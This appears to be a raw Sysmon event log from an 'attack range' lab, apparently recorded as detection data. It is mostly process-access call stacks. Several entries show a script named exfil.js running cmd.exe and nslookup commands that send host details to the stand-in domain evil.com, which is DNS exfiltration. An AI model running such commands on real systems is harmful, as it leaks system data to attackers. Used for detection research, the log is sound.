ntdll.dll+51791 10341000x8000000000000000210854Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.998{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210853Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.998{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210852Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.998{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F0-629A-6B44-000000005F02}5764C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210851Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.998{2E1864BB-18E0-629A-6742-000000005F02}39764592C:\Windows\System32\WScript.exe{2E1864BB-18F0-629A-6B44-000000005F02}5764C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210850Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.999{2E1864BB-18F0-629A-6B44-000000005F02}5764C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlekull.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x800000000000000044807Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:37.752{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C360ED1EB7495A50D5B4BB0FC514F55,SHA256=76FAF8552CF45DDDDBBDD5D823787C2C8DD4E8ECE777A4A52FE1D7B92B4B28A7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000211469Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.984{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F2-629A-A844-000000005F02}2788C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211468Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.984{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F2-629A-A844-000000005F02}2788C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211467Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.984{2E1864BB-18F2-629A-A844-000000005F02}27885232C:\Windows\system32\conhost.exe{2E1864BB-18F2-629A-A744-000000005F02}7060C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211466Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.977{2E1864BB-E13E-6299-0D00-000000005F02}9126412C:\Windows\system32\svchost.exe{2E1864BB-FA4D-6299-5F07-000000005F02}6532C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3d877|c:\windows\system32\rpcss.dll+29a97|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211465Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.962{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F2-629A-A844-000000005F02}2788C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211464Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.962{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211463Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.962{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211462Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.962{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211461Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.962{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211460Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.962{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F2-629A-A744-000000005F02}7060C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211459Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.962{2E1864BB-18E0-629A-6742-000000005F02}39765604C:\Windows\System32\WScript.exe{2E1864BB-18F2-629A-A744-000000005F02}7060C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211458Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.968{2E1864BB-18F2-629A-A744-000000005F02}7060C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Amazon EC2 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlaaomv.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000211457Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.962{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlvznrkw.tmpMD5=56DBCEFC15EB1306F8CE602736A8089D,SHA256=D5DF994C5494FA571A4E37094E6011B6EAA7240C900C90D4E5CDDC8058C5BBCD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000211456Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.930{2E1864BB-18F2-629A-A544-000000005F02}4364208C:\Windows\system32\conhost.exe{2E1864BB-18F2-629A-A644-000000005F02}2088C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211455Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.930{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211454Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.930{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211453Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.930{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211452Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.930{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F2-629A-A644-000000005F02}2088C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211451Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.930{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211450Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.930{2E1864BB-18F2-629A-A444-000000005F02}78562520C:\Windows\system32\cmd.exe{2E1864BB-18F2-629A-A644-000000005F02}2088C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211449Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.938{2E1864BB-18F2-629A-A644-000000005F02}2088C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Model: t3.2xlarge evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F2-629A-A444-000000005F02}7856C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Model: t3.2xlarge evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvznrkw.tmp 2>&1 10341000x8000000000000000211448Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.915{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F2-629A-A544-000000005F02}436C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211447Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.915{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F2-629A-A544-000000005F02}436C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211446Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.915{2E1864BB-18F2-629A-A544-000000005F02}4364208C:\Windows\system32\conhost.exe{2E1864BB-18F2-629A-A444-000000005F02}7856C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211445Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.899{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F2-629A-A544-000000005F02}436C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211444Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.883{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211443Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 